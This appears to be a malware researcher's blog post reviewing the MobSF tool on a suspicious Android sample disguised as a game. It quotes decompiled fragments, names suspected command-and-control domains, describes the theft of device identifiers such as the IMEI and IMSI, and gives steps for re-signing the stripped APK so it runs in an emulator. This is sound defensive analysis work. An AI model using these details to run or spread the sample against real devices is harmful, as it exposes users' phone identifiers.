Blind try of MobSF over a suspicious Android sample

Static analysis with MobSF

For an impatient user, a 3-minute analysis seems a bit long, however it completes without any issue :)
Looks like an asset is decrypted and perhaps dynamically loaded afterwards

Which asset is decrypted and is it loaded dynamically?

public static final String b = "mosco";
...
public p69691c7b(Context context) { this.Z = false; try { InputStream decryptAsset = DecryptAsset.decryptAsset(context.getAssets(), b);...

Executing OS commands?

The code issues 2 commands: (1) logcat -d -v RAW -s AndroidRuntime:E -p package , which retrieves error messages of the malware, and (2) clears the log. Fortunately, neither command are real issues because they only concern the malware itself and its capacity to debug itself.

MobSF says malware author(s) do not write secure code 😆

CnC?

Some are obviously benign (e.g maps.google.com), but I’ll definitely check d.wiyux.com, lzn1007.blog.sohu.com, and wap.juliu.net (not shown on the image, below).
The URL table shows where URLs are used. Very handy.
The code shows the malware posts various device information to Wiyux.com. Nothing too sensitive apart the IMEI (returned by p() in did, q() returns the android ID). In some other classes, the code sets cookies for this URL.
public static final String str_help_msg_en = “Plants VS Zombs 2.4\nProgrammer:lzn1007\nMAIL:liangzhenning@gmail.com\nBlog:http://lzn1007.blog.sohu.com\n\nGame Mode:\nDAY:Ordinary mode of existence.\nNIGHT: [..]
The code sends the IMEI, SIM serial number, IMSI and Build model.

Dynamic analysis

$ adb install ksapp.apk
Performing Streamed Install
adb: failed to install ksapp.apk: Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES: Failed to collect certificates from /data/app/vmdl1088091278.tmp/base.apk: META-INF/OBFUSCAT.SF indicates /data/app/vmdl1088091278.tmp/base.apk is signed using APK Signature Scheme v2, but no such signature was found. Signature stripped?]
  1. Generate a test keystore with keytool
  2. Sign the “faulty” apk with apksigner (ships with the Android SDK). In my case: ~/Android/Sdk/build-tools/30.0.3/apksigner sign — ks my.jks — min-sdk-version 25 — in ksapp.apk — out signed-ksapp.apk
The dynamic analysis UI is nice, but IMHO not ergonomic at all! The colums for Frida Logs or Frida Code Editor are too small (unless your screen is very large!)
  • Frida logs show nothing interesting [in the case of this sample]
  • The AES script does not launch: probably the sample does not reach the point where AES decryption is triggered?
The sample is stuck on this splash screen and crashes when I click 😢 to try and get more code executed.

Have I missed anything?

Recap / Conclusion

  • Pros. I particularly like the “Android API” and “URL” tables. I also like to quickly jump to relevant part of the code. The dynamic analysis works well — compared to House and Dexcalibur, I appreciated it installs the APK + Frida server automatically.
  • Cons (personal!). For malware analysts, the static analysis displays lots of useless information e.g we don’t care how the developer could have secured his/her code better 😉 + Research with the code is limited: MobSF clearly does not have the features of a real decompiler. I miss cross references! Finally, I didn’t like the UI of dynamic analysis : too small, not intuitive, presence of useless features (e.g taking screenshots of the emulator, or viewing the emulator in the web page : we can do that easily from the emulator) while some other feature would need more explanation (what do the options do, indicate if Frida script is loaded or not, respawn an APK etc). On this account, Dexcalibur’s web interface is much better : we understand what buttons do quite intuitively. The good news is that all of this is perfectly fixable 😃

Mobile and IoT malware researcher. The postings on this account are solely my own opinion and do not represent my employer.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Prifina Comments to the Proposed EU Data Act: What Will Data Access, Interoperability, and Data…

Do you want to earn upto $40,000 ?

DC-3 and DC-4 writeup

How Microsoft bullies people on it’s newly acquired Github platform

{UPDATE} Checkers Online HD - Play English, International, Canadian, & Russian Draughts Board Game…

{UPDATE} Dino Egg Hack Free Resources Generator

Top security systems for homes

A Self-Sovereign Identity approach to identify fraudulent bank calls and speed up banking services

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
@cryptax

@cryptax

Mobile and IoT malware researcher. The postings on this account are solely my own opinion and do not represent my employer.

More from Medium

Android Pentesting-Intents

OWASP UnCrackable App for Android Level 1 — Walkthrough

Log4Shell : JNDI Injection via Attackable Log4J

Analysis of Android malware faking Korean bank application